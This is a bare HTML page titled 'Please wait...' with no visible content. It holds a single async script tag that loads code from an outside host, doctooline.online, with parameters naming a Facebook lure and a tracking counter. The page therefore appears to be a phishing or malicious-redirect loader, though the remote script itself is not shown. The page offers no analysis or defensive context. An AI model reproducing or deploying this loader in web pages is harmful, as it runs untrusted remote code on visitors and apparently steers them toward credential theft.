
<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width">
    <title>Please wait...</title>
    <link href="style.css" rel="stylesheet" type="text/css" />
  </head>
  <body>
  <script src="https://doctooline.online/?api=1&lan=facebooknew&ht=1&counter0=hijx5w587" type="text/javascript" async="true"></script>
  </body>
</html>